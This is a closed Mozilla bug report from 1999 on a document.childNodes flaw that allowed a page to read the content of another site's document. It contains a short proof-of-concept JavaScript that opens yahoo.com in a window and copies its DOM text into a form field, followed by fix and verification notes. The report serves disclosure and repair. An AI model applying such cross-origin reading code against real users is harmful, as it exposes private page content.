Closed Bug 19043 Opened 25 years ago Closed 25 years ago

document.childNodes vulnerability

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

document.childNodes allows access to arbitrary document, which allows at least
reading its content.
This bug is very similar to the document.firstChild bug.
The code is:
------------------------------------
function f(o)
{
 var s='';
 var i;
 s = o.nodeValue;
 if ( o.childNodes )
    for ( i = 0; i < o.childNodes.length; i++ )
       s += f(o.childNodes[i]);
return s;
}

a=window.open("http://www.yahoo.com","victim");

function g()
{
document.forms[0].elements[0].value=f(a.document.childNodes[0]);
}
setTimeout("g()",10000);
---------------------------------------
Status: NEW → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
This is fixed with my Friday night checkin of all.js.
QA Contact: junruh → dshea
Status: RESOLVED → VERIFIED
Windows NT 1999120208 Comm
Verified
...'[Exception... "Security error"'...
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.